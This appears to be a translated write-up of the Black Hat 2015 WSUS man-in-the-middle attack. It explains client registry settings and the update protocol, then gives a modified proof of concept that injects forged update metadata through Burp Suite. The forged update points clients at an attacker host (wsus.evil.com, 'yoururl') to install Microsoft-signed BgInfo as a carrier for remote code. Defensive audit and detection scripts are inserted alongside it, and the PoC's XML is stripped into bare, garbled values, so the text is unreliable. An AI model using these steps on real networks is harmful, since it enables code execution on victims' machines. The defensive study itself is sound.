Black Hat: Theory and Practice of WSUS Vulnerability Exploitation
Paul Stone and Alex Chapman presented a Windows Server Update Services (WSUS) vulnerability at Black Hat 2015. An attacker in a man-in-the-middle (MITM) position can exploit it to make clients download and install forged updates.
As we all know, Microsoft delivers updates to users through the Windows Update service. The client periodically runs wuauclt.exe to contact the update server and check whether new updates are available; if so, it downloads and installs them. In an enterprise environment, thousands of clients each downloading the same update is a great waste of bandwidth, and it leaves administrators little control over which updates are installed and when.
Windows Server Update Services (WSUS) solves this problem. WSUS is an update proxy server: the WSUS server downloads updates from the Internet, caches them locally, and provides the update service to the other Windows computers on the network. Those computers then download updates from the WSUS server rather than from the Internet.
1. WSUS connection settings on the client
In the registry, check whether the UseWUServer value under HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU is 1 (1 means WSUS is enabled, 0 means disabled).
The actual WSUS connection setting is stored in HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\WUServer, for example http://wsus-server.com:8530, where http is the underlying connection protocol, wsus-server.com is the domain name of the WSUS server, and 8530 is the port number.
Of course, if the WSUS server supports HTTPS, https can be used in place of http. However, Microsoft's default setting is HTTP, and most enterprises are reluctant to pay a high certificate fee to support HTTPS.
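An added configuration check (my example, not code from the original post): it reads the two policy values named above from the client registry and reports whether updates are fetched over plaintext HTTP. The default ports 8530 for HTTP and 8531 for HTTPS are WSUS conventions rather than values from this post; on a non-Windows host the script audits a constructed sample value instead of the registry.

```python
import sys
from urllib.parse import urlsplit

# Registry locations from the text (paths relative to HKLM)
WU_KEY = r"SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate"
AU_KEY = WU_KEY + r"\AU"

def audit_wsus_policy(use_wu_server, wu_server):
    r"""Return a list of findings for a client's WSUS policy.

    use_wu_server: AU\UseWUServer (1 = use WSUS, 0 or None = disabled)
    wu_server:     WindowsUpdate\WUServer, e.g. "http://wsus-server.com:8530"
    """
    findings = []
    if use_wu_server != 1 or not wu_server:
        findings.append("WSUS disabled: client talks to Microsoft directly")
        return findings
    parts = urlsplit(wu_server)
    scheme = parts.scheme.lower()
    if scheme == "http":
        findings.append("WUServer uses plaintext HTTP: a MITM can forge update metadata")
    elif scheme != "https":
        findings.append("WUServer has an unexpected scheme: " + parts.scheme)
    # 8530/8531 are the WSUS default HTTP/HTTPS ports (assumed conventions)
    if scheme == "https" and parts.port == 8530:
        findings.append("HTTPS on port 8530: confirm the server really serves TLS there")
    return findings

def read_policy_from_registry():
    """Read both values from HKLM on a Windows host (None if absent)."""
    import winreg  # Windows-only module, imported lazily

    def read(subkey, name):
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, subkey) as key:
                return winreg.QueryValueEx(key, name)[0]
        except OSError:
            return None

    return read(AU_KEY, "UseWUServer"), read(WU_KEY, "WUServer")

if __name__ == "__main__":
    if sys.platform == "win32":
        use_wu, server = read_policy_from_registry()
    else:
        use_wu, server = 1, "http://wsus-server.com:8530"  # constructed sample
    for finding in audit_wsus_policy(use_wu, server):
        print(finding)
```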
2. WSUS Protocol
WSUS communicates using SOAP XML messages carried over HTTP. The client first tells the update server which updates are already installed (SyncUpdates). The server returns a result (SyncUpdatesResult) indicating which new updates it can provide. The client then queries the details of the new updates (GetExtendedUpdateInfo), and finally the server replies with the specific information (GetExtendedUpdateInfoResult). Note that SyncUpdates is sent twice: the first request is for software updates, the second for hardware driver updates.
Here is an intuitive example:
1. Client: I have installed software updates 1, 2 and 3. Are there any new updates?
2. WSUS server: Yes! Update 4 is available; you can install it.
3. (hardware driver synchronization omitted)
4. (hardware driver synchronization result omitted)
5. Client: I want to install software update 4. Can you give me the details?
6. WSUS server: OK. You can download update 4 from http://1.2.3.4/update/4.cab. Note that its SHA-1 hash is A1..FF.
After downloading, the client verifies the hash and the signature of the update. If both check out, it installs the update automatically or notifies the user to install it manually.
3. Risks
By default, WSUS servers only support HTTP. HTTP itself provides no confidentiality or integrity for messages and gives the client no way to authenticate the server, so an attacker in a man-in-the-middle (MITM) position can hijack the WSUS communication and insert forged updates to deceive the client. There are many ways to obtain a MITM position, such as ARP spoofing, which is not discussed here. This article focuses on how WSUS messages are forged.
The attacker inserts a forged update ID into SyncUpdatesResult and then supplies a forged URL in GetExtendedUpdateInfoResult to trick the client into downloading and installing it, as shown in
An example of an attack is as follows:
1. Client: I have installed software updates 1, 2 and 3. Are there any new updates?
2. WSUS server: No.
3. Attacker: Yes! Update 4 is available; you can install it.
4. (hardware driver synchronization omitted)
5. (hardware driver synchronization result omitted)
6. Client: I want to install software update 4. Can you give me the details?
7. Attacker: OK. You can download update 4 from http://wsus.evil.com/update/evil.exe. Note that its SHA-1 hash is BF...EF.
The client then downloads evil.exe from http://wsus.evil.com/update/. There is, however, a further protection mechanism: every downloaded update must be signed by Microsoft, and if signature verification fails the downloaded file is deleted immediately. Microsoft's signature is still hard to forge, so is there no way forward?
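A defender-side check that goes with the exchange above (an added example, not from the post or the Black Hat PoC): parse the file locations in a GetExtendedUpdateInfoResult and flag any download URL whose host is neither the configured WSUS server nor an explicitly allowed host. The element names FileLocation, FileDigest and Url are assumed from the response fragment shown later in the post; the sample response is constructed, and XML namespaces are ignored.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed sample: the server's own FileLocation plus one injected by a MITM
SAMPLE_RESPONSE = """<GetExtendedUpdateInfoResult>
  <FileLocations>
    <FileLocation>
      <FileDigest>A1...FF</FileDigest>
      <Url>http://wsus-server.com:8530/Content/update4.cab</Url>
    </FileLocation>
    <FileLocation>
      <FileDigest>BF...EF</FileDigest>
      <Url>http://wsus.evil.com/update/evil.exe</Url>
    </FileLocation>
  </FileLocations>
</GetExtendedUpdateInfoResult>"""

def _local(tag):
    """Strip a namespace prefix like {urn:...} from an element tag."""
    return tag.rsplit("}", 1)[-1]

def find_offserver_urls(response_xml, wu_server, extra_hosts=()):
    """Return download URLs that do not come from an allowed host.

    wu_server:   the client's WUServer value, e.g. "http://wsus-server.com:8530"
    extra_hosts: other hosts the client may legitimately fetch content from
                 (e.g. Microsoft download servers when WSUS does not store
                 content locally); this allowlist is assumed to be maintained
                 by the defender
    """
    expected_host = (urlsplit(wu_server).hostname or "").lower()
    allowed = {expected_host, *[h.lower() for h in extra_hosts]}
    suspicious = []
    for elem in ET.fromstring(response_xml).iter():
        if _local(elem.tag) != "Url" or not (elem.text or "").strip():
            continue
        url = elem.text.strip()
        host = (urlsplit(url).hostname or "").lower()
        if host not in allowed:
            suspicious.append(url)
    return suspicious

if __name__ == "__main__":
    for url in find_offserver_urls(SAMPLE_RESPONSE, "http://wsus-server.com:8530"):
        print("unexpected update source:", url)
```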
In fact, there is no need to forge a signature. Think of software that is already signed by Microsoft, in particular the Sysinternals tools, many of which can be put to bad use; PsExec and BgInfo, for example, are both programs carrying Microsoft signatures. (The first candidate that comes to mind is cmd.exe, but cmd.exe is not actually signed by Microsoft.)
1. PsExec: a lightweight telnet-like tool (http://baike.baidu.com/view/555225.htm)
2. BgInfo: can execute VBS scripts (https://technet.microsoft.com/zh-cn/2007.08.utilityspotlight)
In this way, an attacker can disguise PsExec or BgInfo as an update, combine it with a crafted installation script, and push it to the client to be installed and run.
4. Proof Of Concept (POC)
The POC provided by Paul Stone and Alex Chapman seems to have some bugs; at least I could not get it to work. Here I provide a modified POC. Its goal is to disguise BgInfo as an update and push it to the client for download and installation.
I hijack and modify the WSUS messages locally using Burp Suite.
1. Insert the following message into the first SyncUpdatesResult message, before false:
19999992
199992
Bundle
True
Septem
0
0
0
0
True
19999993
199993
Install
True
0
0
0
0
True
2. The second SyncUpdatesResult message concerns hardware drivers and does not need to be modified.
3. Delete 19999992 19999993 in the GetExtendedUpdateInfo message, and
4. In the GetExtendedUpdateInfoResult message... Adding
19999992
A2LNbnsxirmkx02vIp8Ru3laLOVT6gJMtJFDRWwnxB0 =
19999993
Http://support.microsoft. comMS15-0413037581
19999992
Enanything-in-here
19999993
EnA fake update exampleFreebuf is good... http://support.microsoft.com/kb/3037581http://support.microsoft.com
In... Adding
HO4/qEGb30y8JmRhJ34/3ZuT3iU =
http://yoururl/archive/Bginfo.exe
Replace yoururl in the Url tag with your own host name.
Once the modified messages are forwarded, the client accepts the forged update information.
Check the update information.
bginfo.exe has been downloaded to the local machine.
Try to install it!